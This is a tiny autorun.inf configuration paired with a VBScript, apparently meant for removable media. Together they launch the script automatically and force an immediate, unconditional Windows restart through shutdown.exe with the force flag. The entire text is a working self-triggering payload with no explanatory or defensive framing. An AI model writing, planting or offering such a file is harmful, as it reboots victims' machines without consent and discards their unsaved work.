[autorun]
shellexecute=Shutdown.vbs
 

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "%windir%\system32\shutdown.exe -r -f -t 00"